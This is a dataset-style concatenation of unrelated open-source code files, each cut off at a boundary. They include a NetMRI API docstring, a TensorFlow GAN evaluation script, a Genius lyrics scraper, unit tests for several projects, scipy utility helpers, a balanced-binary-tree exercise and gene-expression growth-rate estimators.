"""Lists the available issue details. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the
|
various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BatchID:
|
The internal NetMRI identifier for the job execution batch to which this issue applies, if relevant.
:type BatchID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BatchID: The internal NetMRI identifier for the job execution batch to which this issue applies, if relevant.
:type BatchID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this issue applies.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this issue applies.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param EndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type EndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param EndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type EndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface to which this issue applies, if relevant.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface to which this issue applies, if relevant.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IprgID: The internal NetMRI identifier for the HSRP or VRRP group to which this issue applies, if relevant.
:type IprgID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprgID: The internal NetMRI identifier for the HSRP or VRRP group to which this issue applies, if relevant.
:type IprgID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IssueID: The internal NetMRI identifier for this issue instance.
:type IssueID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IssueID: The internal NetMRI identifier for this issue instance.
:type IssueID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IssueTypeID: An internal NetMRI identifier for the type of this issue.
:type IssueTypeID: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IssueTypeID: An internal NetMRI identifier for the type of this issue.
:type IssueTypeID: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetID: The internal NetMRI identifier for the subnet to which this issue applies, if relevant.
:type SubnetID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetID: The internal NetMRI identifier for the subnet to which this issue applies, if relevant.
:type SubnetID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param Timestamp: The date and time this record was collected or calculated.
:type Timestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param Timestamp: The date and time this record was collected or calculated.
:type Timestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN to which this issue applies, if relevant.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN to which this issue applies, if relevant.
:type VlanID: Array of In
|
tensorflow/gan
|
tensorflow_gan/examples/mnist/infogan_eval.py
|
Python
|
apache-2.0
| 2,490
| 0.001606
|
# coding=utf-8
# Copyright 2022 The TensorFlow GAN Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the L
|
icense.
# You may obtain a copy o
|
f the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluates an InfoGAN TFGAN trained MNIST model.
The image visualizations, as in https://arxiv.org/abs/1606.03657, show the
effect of varying a specific latent variable on the image. Each visualization
focuses on one of the three structured variables. Columns have two of the three
variables fixed, while the third one is varied. Different rows have different
random samples from the remaining latents.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import tensorflow.compat.v1 as tf
from tensorflow_gan.examples.mnist import infogan_eval_lib
flags.DEFINE_string('checkpoint_dir', '/tmp/mnist/',
'Directory where the model was written to.')
flags.DEFINE_string('eval_dir', '/tmp/mnist/',
'Directory where the results are saved to.')
flags.DEFINE_integer(
'noise_samples', 6,
'Number of samples to draw from the continuous structured '
'noise.')
flags.DEFINE_integer('unstructured_noise_dims', 62,
'The number of dimensions of the unstructured noise.')
flags.DEFINE_integer('continuous_noise_dims', 2,
'The number of dimensions of the continuous noise.')
flags.DEFINE_integer(
'max_number_of_evaluations', None,
'Number of times to run evaluation. If `None`, run '
'forever.')
flags.DEFINE_boolean('write_to_disk', True, 'If `True`, run images to disk.')
FLAGS = flags.FLAGS
def main(_):
hparams = infogan_eval_lib.HParams(
FLAGS.checkpoint_dir, FLAGS.eval_dir, FLAGS.noise_samples,
FLAGS.unstructured_noise_dims, FLAGS.continuous_noise_dims,
FLAGS.max_number_of_evaluations,
FLAGS.write_to_disk)
infogan_eval_lib.evaluate(hparams, run_eval_loop=True)
if __name__ == '__main__':
tf.disable_v2_behavior()
app.run(main)
|
iluxonchik/lyricist
|
lyricist/rapgenius/rgartist.py
|
Python
|
mit
| 5,427
| 0.006633
|
import re
from bs4 import BeautifulSoup
from ..const import constant
from ..bsopener import BSOpener
class RGArtist(object):
"""RapGeniusArtist"""
class _Const(object):
""" Contains constants used in outter class """
@constant
def RG_ARTIST_BASE_URL():
return "http://genius.com/artists/"
@constant
def RG_ARTIST_SONGS_BASE_URL():
return "http://genius.com/artists/songs?for_artist_page="
@constant
def RG_ARTIST_PAGENUM_PREF():
""" Prefix for page number """
return "&page="
def __init__(self, artist_url):
self.CONST = self._Const()
self.urlopener = BSOpener()
self.artist_url = artist_url
self.artist_id = self._get_artist_id(self.artist_url) # numerical artist id
self.artist_songs = self.CONST.RG_ARTIST_SONGS_BASE_URL + self.artist_id
@classmethod
def from_artist_name(cls, artist_name):
""" Returns a new instance of RGArtist from artist name
Assumes that the artist url is in the form
http://genius.com/artists/<artist_name>, where
<artist_name> is the artist_name provided as an
argu
|
ment with spaces replaced by "-" and "." removed. This method might return
|
a bogus url, since RapGenius doesn't seem to be following any convention for
the names (for example, sometimes "." in names simply get removed, while in
other instances they get replaced by "-").
"""
return RGArtist(cls._Const().RG_ARTIST_BASE_URL + artist_name.replace(" ", "-").replace(".", ""))
def _get_artist_id(self, artist_url):
""" Returns the numeric id of the artist """
bsObj = self.urlopener.bsopen(artist_url)
content_val = bsObj.find("meta", {"property":"twitter:app:url:iphone"}).attrs["content"]
return re.findall("[0-9]+$", content_val)[0]
def _get_songs_BSObj(self, page_num=1):
""" Returns a list of song BeautifulSoup objects
The returned list contains the <li>'s of each song, the song url and other info,
such as the song title, can be extracted from it.
Returns:
list: list of song BeautifulSoup objects if there is at least one song on the page
None: if there are no songs on the page
"""
page_url = self.artist_songs + self.CONST.RG_ARTIST_PAGENUM_PREF + str(page_num)
print("Page url = " + page_url)
bsObj = self.urlopener.bsopen(page_url)
song_container = bsObj.find("ul", {"class":["song_list", "primary_list"]})
if song_container is None:
return None # no songs found on the page
return song_container.findAll("li")
def _get_song_text_BSObj(self, song_url):
""" Returns BeautifulSoup object with the lyrics content """
bsObj = self.urlopener.bsopen(song_url)
return bsObj.find("lyrics", {"class":"lyrics"}).find("p") if bsObj is not None else None
def get_song_urls(self, page_num=1):
""" Return a list of song urls from page page_num.
Returns:
list: list of song urls (as strings) if there is at least one song on the page
None: if there are no songs on the page
"""
bsObj_list = self._get_songs_BSObj(page_num)
if bsObj_list is None:
return None # no songs found on the page
song_urls = [] # contains the list of song urls found on the page
# not using list comprehension because we want to filter out None's
for bsObj in bsObj_list:
anchor = bsObj.find("a", {"class":"song_link"})
# make sure that we don't include any None's in our urls list
if anchor is not None:
url = anchor.attrs["href"]
if url is not None:
song_urls += [url]
# we don't want to return empty lists
return song_urls if len(song_urls) > 0 else None
def get_songs_title(self, page_num=1):
""" Return a list of song titles from page page_num.
Returns:
list: list of song titles (as strings) if there is at least one song on the page
None: if there are no songs on the page
"""
bsObj_list = self._get_songs_BSObj(page_num)
if bsObj_list is None:
return None # no songs found on the page
song_titles = [] # contains the list of song titles found on the page
# not using list comprehension because we want to filter out None's
for bsObj in bsObj_list:
span = bsObj.find("span", {"class":"song_title"})
# make sure that we don't include any None's or empty strings in our titles list
if span not in [None, ""]:
title = span.get_text()
if title is not None:
song_titles += [title]
# we don't want to return empty lists
return song_titles if len(song_titles) > 0 else None
def get_song_text(self, url):
""" Returns song text as a string """
result = ""
bsObj = self._get_song_text_BSObj(url)
return "".join(bsObj.find_all(text=True)) if bsObj is not None else ""
def get_song_title(self, url):
""" Returns song title as a string """
pass
|
heineman/algorithms-nutshell-2ed
|
PythonCode/test/__init__.py
|
Python
|
mit
| 199
| 0.025126
|
__all__ = ["test_avl
|
", "test_binary", "test_bloom", "test_fortune", "test_hashtable",
"test_kd", "test_kd_factory", "test_knapsack", "test_mergesor
|
t", "test_quad",
"test_R"]
|
jwir3/transgression
|
src/transgression/test/test_config.py
|
Python
|
mpl-2.0
| 4,338
| 0.011296
|
import os
import sys
sys.path.insert(0,os.path.abspath(__file__+"/../.."))
import unittest
import json
from transgression import config
class ConfigTest(unittest.TestCase):
def setUp(self):
self.mJsonString = open(os.path.abspath(os.path.dirname(os.path.realpath(__file__))+"/data/testConfig.json"), 'r').read()
def test_configuration_construction(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
self.assertTrue(configObj.hasApplication('Jingit'))
self.assertEquals('Jingit', configObj.getApplication('Jingit').getAppName())
self.assertEquals('air.com.jingit.mobile', configObj.getApplication('Jingit').getPlatformConfiguration('android').getProcessName())
self.assertEquals(2009, configObj.getApplication('Jingit').getPlatformConfiguration('android').getFirstBinaryDate().year)
self.assertEquals('sftp', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getProtocol())
self.assertEquals('jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk', configObj.getApplication('Jingit').getPlatformConfiguration('android').getBinaryRepository().getLocationFormatString())
def test_configuration_add_application(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
platformConfigDict = { 'windows' : { 'firstBinaryDate' : '2010-01-01', 'processName' : 'Jingit-bin', 'binaryRepository' : { 'protocol' : 'sftp', 'location': 'www.google.com'}}}
configObj.addApplication('testApp', platformConfigDict)
self.assertTrue(configObj.hasApplication('testApp'))
self.assertEquals('testApp', configObj.getApplication('testApp').getAppName())
self.assertEquals('Jingit-bin', configObj.getApplication('testApp').getPlatformConfiguration('windows').getProcessName())
self.assertEquals(2010, configObj.getApplication('testApp').getPlatformConfiguration('windows').getFirstBinaryDate().year)
self.assertEquals('sftp', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getProtocol())
self.assertEquals('www.google.com', configObj.getApplication('testApp').getPlatformConfiguration('windows').getBinaryRepository().getLocationFormatString())
# def test_add_application(self):
# configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
# platformConfigDict = { 'windows' : { 'firstBinaryDate' : '2010-01-01', 'processName' : 'Jingit-bin', 'binaryRepository' : { 'protocol' : 'sftp', 'location': 'www.google.com'}}}
# configObj.addApplication('WokkaWokka', platformConfigDict)
def test_json_encoding(self):
configObj = json.loads(self.mJsonString, object_hook=config.config_decoder)
app = configObj.getApplication('Jingit')
platConfig = app.getPlatformConfiguration('android')
binRepo = platConfig.getBinaryRepository()
expectedBinaryRepoOutput = "{ 'protocol' : 'sftp', 'location' : 'jenkinsmonkey.local/APKS/%year%-%month%-%day%/%time%/%commitid%/%appname%-debug-%buildnumber%.apk'}"
self.assertEquals(expectedBinaryRepoOutput, config.BinaryRepositoryEncoder.encode(binRepo))
self.assertEquals(expectedBinaryRepoOutput, json.dumps(binRepo, cls=config.BinaryRepositoryEncoder))
expectedPlatConfigOutput = "{ 'processName' : 'air.com.jingit.mobile', 'firstBinaryDate' : '2009-01-01', 'binaryRepository' : " + expectedBinaryRepoOutput + "}"
self.assertEquals(exp
|
ectedPlatConfigOutput, config.PlatformConfigurationEncoder.encode(platConfig))
self.assertEquals(expectedPlatConfigOutput, json.dumps(platConfig, cls=config.PlatformConfigurationEncoder))
expectedAppConfigOutput = "{ 'Jingit': { 'platformConfigurations' : { " + expectedPlatConfigOutput + "}}}"
self.assertEquals(expec
|
tedAppConfigOutput, config.ApplicationConfigEncoder.encode(app))
self.assertEquals(expectedAppConfigOutput, json.dumps(app, cls=config.ApplicationConfigEncoder))
expectedConfigOutput = "{ '__type__' : 'transgression-configuration', 'applications' : " + expectedAppConfigOutput + "}}"
self.assertEquals(expectedConfigOutput, config.ConfigEncoder.encode(configObj))
self.assertEquals(expectedConfigOutput, json.dumps(configObj, cls=config.ConfigEncoder, indent=2))
if __name__ == '__main__':
unittest.main()
|
gkc1000/pyscf
|
pyscf/pbc/tdscf/test/test_rhf_slow.py
|
Python
|
apache-2.0
| 3,697
| 0.000541
|
from pyscf.pbc.gto import Cell
from pyscf.pbc.scf import RHF
from pyscf.pbc.tdscf import TDHF
from pyscf.pbc.tdscf.rhf_slow import PhysERI, PhysERI4, PhysERI8, TDRHF
from pyscf.tdscf.common_slow import eig
from test_common import retrieve_m, retrieve_m_hf, assert_vectors_close
import unittest
from numpy import testing
class DiamondTestGamma(unittest.TestCase):
"""Compare this (rhf_slow) vs reference (pyscf)."""
@classmethod
def setUpClass(cls):
cls.cell = cell = Cell()
# Lift some degeneracies
cell.atom = '''
C 0.000000000000 0.000000000000 0.000000000000
C 1.67 1.68 1.69
'''
cell.basis = {'C': [[0, (0.8, 1.0)],
[1, (1.0, 1.0)]]}
# cell.basis = 'gth-dzvp'
cell.pseudo = 'gth-pade'
cell.a = '''
0.000000000, 3.370137329, 3.370137329
|
3.370137329, 0.000000000, 3.370137329
3.370137329, 3.370137329, 0.000000000'''
cell.unit = 'B'
cell.verbose = 5
cell.build()
cls.model_rhf = model
|
_rhf = RHF(cell)
model_rhf.kernel()
cls.td_model_rhf = td_model_rhf = TDHF(model_rhf)
td_model_rhf.nroots = 5
td_model_rhf.kernel()
cls.ref_m_rhf = retrieve_m(td_model_rhf)
@classmethod
def tearDownClass(cls):
# These are here to remove temporary files
del cls.td_model_rhf
del cls.model_rhf
del cls.cell
def test_eri(self):
"""Tests all ERI implementations: with and without symmetries."""
for eri in (PhysERI, PhysERI4, PhysERI8):
try:
e = eri(self.model_rhf)
m = e.tdhf_full_form()
# Test matrix vs ref
testing.assert_allclose(m, retrieve_m_hf(e), atol=1e-14)
# Test matrix vs pyscf
testing.assert_allclose(self.ref_m_rhf, m, atol=1e-14)
vals, vecs = eig(m, nroots=self.td_model_rhf.nroots)
testing.assert_allclose(vals, self.td_model_rhf.e, atol=1e-5)
except Exception:
print("When testing {} the following exception occurred:".format(eri))
raise
def test_class(self):
"""Tests container behavior."""
model = TDRHF(self.model_rhf)
model.nroots = self.td_model_rhf.nroots
assert model.fast
e, xy = model.kernel()
model.fast = False
model.kernel()
# Slow vs fast
testing.assert_allclose(model.e, e)
assert_vectors_close(model.xy, xy)
# ... vs ref
testing.assert_allclose(model.e, self.td_model_rhf.e, atol=1e-12)
assert_vectors_close(model.xy, self.td_model_rhf.xy, atol=1e-12)
# Test real
testing.assert_allclose(model.e.imag, 0, atol=1e-8)
def test_cplx(self):
"""Tests whether complex conjugation is handled correctly."""
# Perform mf calculation
model_rhf = RHF(self.cell)
model_rhf.kernel()
# Add random phases
import numpy
numpy.random.seed(0)
p = numpy.exp(2.j * numpy.pi * numpy.random.rand(model_rhf.mo_coeff.shape[1]))
model_rhf.mo_coeff = model_rhf.mo_coeff * p[numpy.newaxis, :]
m_ref = PhysERI(model_rhf).tdhf_full_form()
td_model_rhf = TDRHF(model_rhf)
assert not td_model_rhf.fast
td_model_rhf.kernel()
with self.assertRaises(ValueError):
td_model_rhf.fast = True
td_model_rhf.kernel()
self.assertIsInstance(td_model_rhf.eri, PhysERI4)
m = td_model_rhf.eri.tdhf_full_form()
testing.assert_allclose(m, m_ref, atol=1e-14)
|
nmayorov/scipy
|
scipy/_lib/_util.py
|
Python
|
bsd-3-clause
| 16,576
| 0.000241
|
import functools
import operator
import sys
import warnings
import numbers
from collections import namedtuple
from multiprocessing import Pool
import inspect
import math
import numpy as np
try:
from numpy.random import Generator as Generator
except ImportError:
class Generator(): # type: ignore[no-redef]
pass
def _lazywhere(cond, arrays, f, fillvalue=None, f2=None):
"""
np.where(cond, x, fillvalue) always evaluates x even where cond is False.
This one only evaluates f(arr1[cond], arr2[cond], ...).
Examples
--------
>>> a, b = np.array([1, 2, 3, 4]), np.array([5, 6, 7, 8])
>>> def f(a, b):
... return a*b
>>> _lazywhere(a > 2, (a, b), f, np.nan)
array([ nan, nan, 21., 32.])
Notice, it assumes that all `arrays` are of the same shape, or can be
broadcasted together.
"""
if fillvalue is None:
if f2 is None:
raise ValueError("One of (fillvalue, f2) must be given.")
else:
fillvalue = np.nan
else:
if f2 is not None:
raise ValueError("Only one of (fillvalue, f2) can be given.")
arrays = np.broadcast_arrays(*arrays)
temp = tuple(np.extract(cond, arr) for arr in arrays)
tcode = np.mintypecode([a.dtype.char for a in arrays])
out = np.full(np.shape(arrays[0]), fill_value=fillvalue, dtype=tcode)
np.place(out, cond, f(*temp))
if f2 is not None:
temp = tuple(np.extract(~cond, arr) for arr in arrays)
np.place(out, ~cond, f2(*temp))
return out
def _lazyselect(condlist, choicelist, arrays, default=0):
"""
Mimic `np.select(condlist, choicelist)`.
Notice, it assumes that all `arrays` are of the same shape or can be
broadcasted together.
All functions in `choicelist` must accept array arguments in the order
given in `arrays` and must return an array of the same shape as broadcasted
`arrays`.
Examples
--------
>>> x = np.arange(6)
>>> np.select([x <3, x > 3], [x**2, x**3], default=0)
array([ 0, 1, 4, 0, 64, 125])
>>> _lazyselect([x < 3, x > 3], [lambda x: x**2, lambda x: x**3], (x,))
array([ 0., 1., 4., 0., 64., 12
|
5.])
>>> a = -np.ones_like(x)
>>> _lazyselect([x < 3, x > 3],
... [lambda x, a: x**2, lambda x, a: a * x**3],
... (x, a), default=np.nan)
array([ 0., 1., 4., nan, -64., -125.])
"""
arrays = np.broadcast_arrays(*arrays)
tcode = np.mintypecode([a.dtype.char for a in arrays])
out = np.full(np.shape(arrays[0]), fill_value=default, dtype=tcode)
for index in range(len(condlist)):
func, cond = choicelis
|
t[index], condlist[index]
if np.all(cond is False):
continue
cond, _ = np.broadcast_arrays(cond, arrays[0])
temp = tuple(np.extract(cond, arr) for arr in arrays)
np.place(out, cond, func(*temp))
return out
def _aligned_zeros(shape, dtype=float, order="C", align=None):
"""Allocate a new ndarray with aligned memory.
Primary use case for this currently is working around a f2py issue
in NumPy 1.9.1, where dtype.alignment is such that np.zeros() does
not necessarily create arrays aligned up to it.
"""
dtype = np.dtype(dtype)
if align is None:
align = dtype.alignment
if not hasattr(shape, '__len__'):
shape = (shape,)
size = functools.reduce(operator.mul, shape) * dtype.itemsize
buf = np.empty(size + align + 1, np.uint8)
offset = buf.__array_interface__['data'][0] % align
if offset != 0:
offset = align - offset
# Note: slices producing 0-size arrays do not necessarily change
# data pointer --- so we use and allocate size+1
buf = buf[offset:offset+size+1][:-1]
data = np.ndarray(shape, dtype, buf, order=order)
data.fill(0)
return data
def _prune_array(array):
"""Return an array equivalent to the input array. If the input
array is a view of a much larger array, copy its contents to a
newly allocated array. Otherwise, return the input unchanged.
"""
if array.base is not None and array.size < array.base.size // 2:
return array.copy()
return array
def prod(iterable):
"""
Product of a sequence of numbers.
Faster than np.prod for short lists like array shapes, and does
not overflow if using Python integers.
"""
product = 1
for x in iterable:
product *= x
return product
def float_factorial(n: int) -> float:
"""Compute the factorial and return as a float
Returns infinity when result is too large for a double
"""
return float(math.factorial(n)) if n < 171 else np.inf
class DeprecatedImport(object):
"""
Deprecated import with redirection and warning.
Examples
--------
Suppose you previously had in some module::
from foo import spam
If this has to be deprecated, do::
spam = DeprecatedImport("foo.spam", "baz")
to redirect users to use "baz" module instead.
"""
def __init__(self, old_module_name, new_module_name):
self._old_name = old_module_name
self._new_name = new_module_name
__import__(self._new_name)
self._mod = sys.modules[self._new_name]
def __dir__(self):
return dir(self._mod)
def __getattr__(self, name):
warnings.warn("Module %s is deprecated, use %s instead"
% (self._old_name, self._new_name),
DeprecationWarning)
return getattr(self._mod, name)
# copy-pasted from scikit-learn utils/validation.py
def check_random_state(seed):
"""Turn seed into a np.random.RandomState instance
If seed is None (or np.random), return the RandomState singleton used
by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
If seed is a new-style np.random.Generator, return it.
Otherwise, raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (numbers.Integral, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
try:
# Generator is only available in numpy >= 1.17
if isinstance(seed, np.random.Generator):
return seed
except AttributeError:
pass
raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
' instance' % seed)
def _asarray_validated(a, check_finite=True,
sparse_ok=False, objects_ok=False, mask_ok=False,
as_inexact=False):
"""
Helper function for SciPy argument validation.
Many SciPy linear algebra functions do support arbitrary array-like
input arguments. Examples of commonly unsupported inputs include
matrices containing inf/nan, sparse matrix representations, and
matrices with complicated elements.
Parameters
----------
a : array_like
The array-like input.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Default: True
sparse_ok : bool, optional
True if scipy sparse matrices are allowed.
objects_ok : bool, optional
True if arrays with dype('O') are allowed.
mask_ok : bool, optional
True if masked arrays are allowed.
as_inexact : bool, optional
True to convert the input array to a np.inexact dtype.
Returns
-------
ret : ndarray
The converted validated array.
"""
if not sparse_ok:
import scipy.sparse
if scipy.sparse.issparse(a):
msg = ('Sparse matrices are not supported by this function. '
'Perhaps one of the scipy.sparse.linalg functions '
'would work instead.')
raise ValueError(msg)
if not mask_
|
schleichdi2/OPENNFR-6.1-CORE
|
opennfr-openembedded-core/meta/lib/oeqa/selftest/oelib/buildhistory.py
|
Python
|
gpl-2.0
| 3,191
| 0.01943
|
import os
import unittest
import tempfile
from git import Repo
from oeqa.utils.commands import get_bb_var
from oe.buildhistory_analysis import blob_to_dict, compare_dict_blobs
class TestBlobParsing(unittest.TestCase):
def setUp(self):
import time
self.repo_path = tempfile.mkdtemp(prefix='selftest-buildhistory',
dir=get_bb_var('TOPDIR'))
self.repo = Repo.init(self.repo_path)
self.test_file = "test"
self.var_map = {}
def tearDown(self):
import shutil
shutil.rmtree(self.repo_path)
def commit_vars(self, to_add={}, to_remove = [], msg="A commit message"):
if len(to_add) == 0 and len(to_remove) == 0:
return
for k in to_remove:
self.var_map.pop(x,None)
for k in to_add:
self.var_map[k] = to_add[k]
with open(os.path.join(self.repo_path, self.test_file), 'w') as repo_file:
for k in self.var_map:
repo_file.write("%s = %s\n" % (k, self.var_map[k]))
self.r
|
epo.git.add("--all")
self.repo.git.commit(message=msg)
def test_blob_to_dict(self):
"""
Test convertion of git blobs to dictionary
"""
valuesmap = { "foo" : "1", "bar" : "2" }
self.commit_vars(to_add = valuesmap)
blob = self.repo.head.commit.tree.blobs[0]
self.assertEqual(valuesmap, blob_to_dict(blob),
"commit was not translated correctly to dictionary")
|
def test_compare_dict_blobs(self):
"""
Test comparisson of dictionaries extracted from git blobs
"""
changesmap = { "foo-2" : ("2", "8"), "bar" : ("","4"), "bar-2" : ("","5")}
self.commit_vars(to_add = { "foo" : "1", "foo-2" : "2", "foo-3" : "3" })
blob1 = self.repo.heads.master.commit.tree.blobs[0]
self.commit_vars(to_add = { "foo-2" : "8", "bar" : "4", "bar-2" : "5" })
blob2 = self.repo.heads.master.commit.tree.blobs[0]
change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
blob1, blob2, False, False)
var_changes = { x.fieldname : (x.oldvalue, x.newvalue) for x in change_records}
self.assertEqual(changesmap, var_changes, "Changes not reported correctly")
def test_compare_dict_blobs_default(self):
"""
Test default values for comparisson of git blob dictionaries
"""
defaultmap = { x : ("default", "1") for x in ["PKG", "PKGE", "PKGV", "PKGR"]}
self.commit_vars(to_add = { "foo" : "1" })
blob1 = self.repo.heads.master.commit.tree.blobs[0]
self.commit_vars(to_add = { "PKG" : "1", "PKGE" : "1", "PKGV" : "1", "PKGR" : "1" })
blob2 = self.repo.heads.master.commit.tree.blobs[0]
change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
blob1, blob2, False, False)
var_changes = {}
for x in change_records:
oldvalue = "default" if ("default" in x.oldvalue) else x.oldvalue
var_changes[x.fieldname] = (oldvalue, x.newvalue)
self.assertEqual(defaultmap, var_changes, "Defaults not set properly")
|
spottradingllc/zoom
|
server/zoom/www/messages/timing_estimate.py
|
Python
|
gpl-2.0
| 855
| 0
|
import json
from zoom.common.types import UpdateType
class TimeEstimateMessage(object):
def __init__(self):
self._message_type = UpdateType.TIMING_UPDATE
self._contents = dict()
@property
def message_type(self):
return self._message_type
@property
def contents(self):
return self._contents
def update(self, item):
"""
:type item: dict
"""
self._contents.update(item)
def combine(self, message):
"""
:type message: TimeEstimateMessage
"""
sel
|
f._contents.update(message.contents)
def clear(self):
self._contents.clear()
def to_j
|
son(self):
_dict = {}
_dict.update({
"update_type": self._message_type,
})
_dict.update(self.contents)
return json.dumps(_dict)
|
shichao-an/ctci
|
chapter4/question4.1.py
|
Python
|
bsd-2-clause
| 1,025
| 0
|
from __future__ import print_function
from tree import create_tree
def get_height(root):
if root is None:
return 0
return max(get_height(root.left), get_height(root.right)) + 1
def is_balanced(root):
"""O(n^2)"""
if root is None:
return True
lb = is_balanced(root.left)
rb = is_balanced(root.right)
tb = abs(get_heigh
|
t(root.left) - get_height(root.right)) <= 1
return lb and rb and tb
def get_height2(root):
"""Get height and check whether balanced"""
if root is None:
return 0
lh = get_height2(root.left)
rh = get_height2(root.right)
if lh != -1 and rh != -1:
if abs(lh - rh) <= 1:
return max(lh, rh) + 1
return -1
def is_balanced2(root):
return get_height2(root) != -1
def
|
_test():
pass
def _print():
a1 = [1, None, 2, 3]
t1 = create_tree(a1)
a2 = [1, 2, 3]
t2 = create_tree(a2)
print(is_balanced(t1))
print(is_balanced(t2))
if __name__ == '__main__':
_test()
_print()
|
yannickmartin/wellFARE
|
wellfare/ILM/fast_estimators.py
|
Python
|
lgpl-3.0
| 5,629
| 0.013857
|
"""
This module implements fast estimators for the time-profiles of
growth rate, promoter activity, and protein concentrations.
These estimators rely on a simple model in which gene expression
is modeled as a one-step process. This enables to compute the
observation matrix directly using an ad-hoc formula.
As a consequence these algorithms are faster and require less
parameters than their counterparts in module ``estimators``
Simple approximations are made to compute the observation matrix,
these are valid as long as the vector of estimation times (ttu) of
the different estimated input (growth rate, promoter actitivity,
protein concentration) has a fine time resolution.
See also:
----------
estimators : collection of functions for the inference
"""
from ..curves import Curve
from .methods import DEFAULT_ALPHAS, infer_control
def ilp_growth_rate(curve_volume, ttu, alphas=None, eps_L=.0001):
"""
Returns
--------
mu, v_smoothed, model
As described below.
mu
Vector of inferred mu.
v_smoothed
The predicted value of the observed volume at the same time
points as the data. v_smoothed will appear smoothed compared to
the measured volume.
mod
instance of sklearn.linear_model.RidgeCV, used for the Ridge
regularization / cross-validation. Useful to get the value of
the parameter alpha used etc.
"""
if isinstance(curve_volume, list):
results = [ilp_growth_rate(v, ttu,
alphas=alphas, eps_L=eps_L)
for v in curve_volume]
return zip(*results)
if alphas is None: alphas = DEFAULT_ALPHAS
ttv = curve_volume.x
dttu = 1.0*(ttu[1]-ttu[0])
H_ic = np.ones((len(ttv),1))
# dT is a Ny x Nu matrix with
# dT[i,j] = ttv[i] - ttu[j]
dT = np.array([ttv]).T - ttu
H_u = ( np.maximum(0, np.minimum(dttu, dT))
* curve_volume(ttu+ dttu/2))
H = np.hstack([H_ic, H_u])
growth_rate, v_smooth, ic, alpha, ascores = \
infer_control(H, y= curve_volume.y, Nic= 1,
alphas= alphas, eps_L = eps_L)
return ( Curve(ttu, growth_rate),
Curve(ttv, v_smooth),
ic, alpha, ascores )
def ilp_synthesis_rate(curve_fluo, curve_volume, ttu, degr,
alphas=None, eps_L=.0001):
"""
dF/dt = s(t)V(t) - degr*F
Parameters
-----------
curve_fluo
A curve instance representing the (noisy) measured
fluorescence
curve_volume
A curve instance representing the (noisy) measured
volume
ttu
Times at which the control is
Returns
--------
synth_rate, fluo_smoothed, ic, alpha, ascores
As described below.
synth_rate
Vector. Inferred control.
fluo_smoothed
The predicted value of the observed data at the same time
points as the data. y_smoothed
|
will appear smoothed compared
to y.
mod
instance of sklearn.linear_model.RidgeCV, used for the Ridge
regularization / cross-validation. Useful to get the value
|
of the parameter alpha used etc.
"""
if isinstance(curve_fluo, list):
results = [ilp_synthesis_rate(f, v, ttu, degr,
